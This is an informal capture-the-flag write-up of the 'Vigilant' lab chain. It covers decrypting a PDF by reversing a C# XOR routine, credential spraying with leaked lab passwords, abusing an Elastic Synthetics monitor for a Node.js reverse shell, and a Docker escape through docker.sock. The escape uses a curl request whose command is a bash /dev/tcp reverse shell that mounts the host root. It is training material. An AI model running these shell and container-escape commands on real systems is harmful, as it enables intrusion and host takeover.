Vigilant (chain) (hard)

port scan

Open 10.10.150.246:22
Open 10.10.150.246:80
Open 10.10.150.245:88
Open 10.10.150.245:135
Open 10.10.150.245:139
Open 10.10.150.245:389
Open 10.10.150.245:445
Open 10.10.150.245:464
Open 10.10.150.245:593
Open 10.10.150.245:636
Open 10.10.150.245:3268
Open 10.10.150.245:3269
Open 10.10.150.245:3389
Open 10.10.150.245:9200
Open 10.10.150.245:9389

service enumeartion

there have ITShare custom share folder

we found a encrypt pdf file

i will download all

decrypt pdf file

i will put ADAudit.dll into dnSpy, there have encrypt function

those c# code will encrypt file

using System;
using System.IO;
using System.Runtime.CompilerServices;

namespace ADAuditLib
{
	// Token: 0x02000004 RID: 4
	[NullableContext(1)]
	[Nullable(0)]
	public class EncryptionHelper
	{
		// Token: 0x0600000B RID: 11 RVA: 0x000029B0 File Offset: 0x00000BB0
		private static byte[] GenerateKey(int length)
		{
			byte[] key = new byte[length];
			new Random(12345).NextBytes(key);
			return key;
		}

		// Token: 0x0600000C RID: 12 RVA: 0x000029D8 File Offset: 0x00000BD8
		private static void ShuffleBytes(ref byte[] data)
		{
			for (int i = 0; i < data.Length - 1; i += 2)
			{
				byte temp = data[i];
				data[i] = data[i + 1];
				data[i + 1] = temp;
			}
		}

		// Token: 0x0600000D RID: 13 RVA: 0x00002A0C File Offset: 0x00000C0C
		public static void EncryptFile(string filePath)
		{
			if (!File.Exists(filePath))
			{
				throw new FileNotFoundException();
			}
			byte[] fileContent = File.ReadAllBytes(filePath);
			byte[] key = EncryptionHelper.GenerateKey(fileContent.Length);
			for (int i = 0; i < fileContent.Length; i++)
			{
				byte[] array = fileContent;
				int num = i;
				array[num] ^= key[i % key.Length];
				fileContent[i] = (byte)((int)fileContent[i] << 4 | fileContent[i] >> 4);
			}
			EncryptionHelper.ShuffleBytes(ref fileContent);
			File.WriteAllBytes(Path.Combine(Path.GetDirectoryName(filePath), Path.GetFileNameWithoutExtension(filePath) + "_encrypted" + Path.GetExtension(filePath)), fileContent);
		}
	}
}

i will write a decrypt c# code, the 6951 is just pdf file length

i will create a new decryptPDF project

change filePath

using System;
using System.Text;
using System.IO;

class Program
{

	private static void ShuffleBytes(ref byte[] data)
	{
		for (int i = 0; i < data.Length - 1; i += 2)
		{
			byte temp = data[i];
			data[i] = data[i + 1];
			data[i + 1] = temp;
		}
	}
    	static void Main()
	{
		byte[] key = new byte[6951];
		new Random(12345).NextBytes(key);

		string filePath = "../../Password_Strength_Report_encrypted.pdf";
		byte[] fileContent = File.ReadAllBytes(filePath);


		ShuffleBytes(ref fileContent);

		for (int i = 0; i < fileContent.Length; i++)
		{

			byte[] array = fileContent;
			int num = i;

			fileContent[i] = (byte)((int)fileContent[i] << 4 | fileContent[i] >> 4);
			array[num] ^= key[i % key.Length];
		}

		File.WriteAllBytes(Path.Combine(Path.GetDirectoryName(filePath), Path.GetFileNameWithoutExtension(filePath) + "_decrypted" + Path.GetExtension(filePath)), fileContent);


    }
}

launch!

ok, we get decrypted password report pdf file!

the pdf show us some cred!

Pamela.Clark:Vigilant@Tech2024
Alex.Powell:Vigilant_Market2024
Edwin.Dixon:Vigilant_Finance$
Daniel.Washington:Vigilant&Strategy!

and a username list

i will use kerbrute to see someone who have not change there weak password

i see Pamela.Clark@vigilant.vl:Vigilant@Tech2024

i will create some custom wordlist try to crack

but not luck

ssh into srv

seems the Pamela user password expired

i will use smbpasswd change password to Vigilant@Tech2023

now i can use the new password login srv host

there have elastic

bruteforce elasticsearch

/etc/.scripts/setup.sh

the 9200 port open on dc, elasticsearch?

ok~

and elastic EDR o_O

yes, we login in with Pamela.Clark cred

and Pamela.Clark role is superuser

abuse Synthetics monitor script

there have Synthetics periodically checks the web page

the monitor script is Playwright, and the Playwright runs inside the Node.js, which mean we can write revershell in nodejs

but we can't add evil script on webpage

maybe we must use Synthetics CLI ?

https://www.elastic.co/guide/en/observability/current/synthetics-command-reference.html#elastic-synthetics-command

API key

Q2lKbTVvNEIycjl0Q0lzNWg2OEg6M09RMWNjQmJTOUNzUTVJVDNQUUxHQQ==

Use as environment variable

export SYNTHETICS_API_KEY=Q2lKbTVvNEIycjl0Q0lzNWg2OEg6M09RMWNjQmJTOUNzUTVJVDNQUUxHQQ==

Project push command

SYNTHETICS_API_KEY=Q2lKbTVvNEIycjl0Q0lzNWg2OEg6M09RMWNjQmJTOUNzUTVJVDNQUUxHQQ== npm run push

i will install https://github.com/elastic/synthetics

the monitor ID is da074d36-e1fe-461d-8ed7-56a00dd3b0e3

change url to http://localhost

add our reverse shell nodejs code. And delete other example journeys. at last, push our code into elastic

npx @elastic/synthetics push --url http://dc.vigilant.vl:5601/ --auth $SYNTHETICS_API_KEY

i will start journeys manually

ok...we have shell!!!!

root

docker break out via docker.sock

i will run ‎Deepce.sh

just like hackthebox extension box, the /var/run/docker.sock writeable

first, i will list useable docker images


curl --unix-socket /var/run/docker.sock http://localhost/images/json -s

i will create a container with reverse shell command to abuse docker.sock

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.8.1.167/80 0>&1'\\\"\"]"

curl -s -X POST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine:latest\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=peterpwn_root


curl --unix-socket /var/run/docker.sock -s -X POST http://localhost/containers/bf924e6558a15e3cd1aea7b7ee27913eeb9e4eef9a70954d17ab121bb732df90/start

after the containers, we can have a root reveseshell. And then, i will put my key into /root/.ssh/authorized_keys and dump machine hash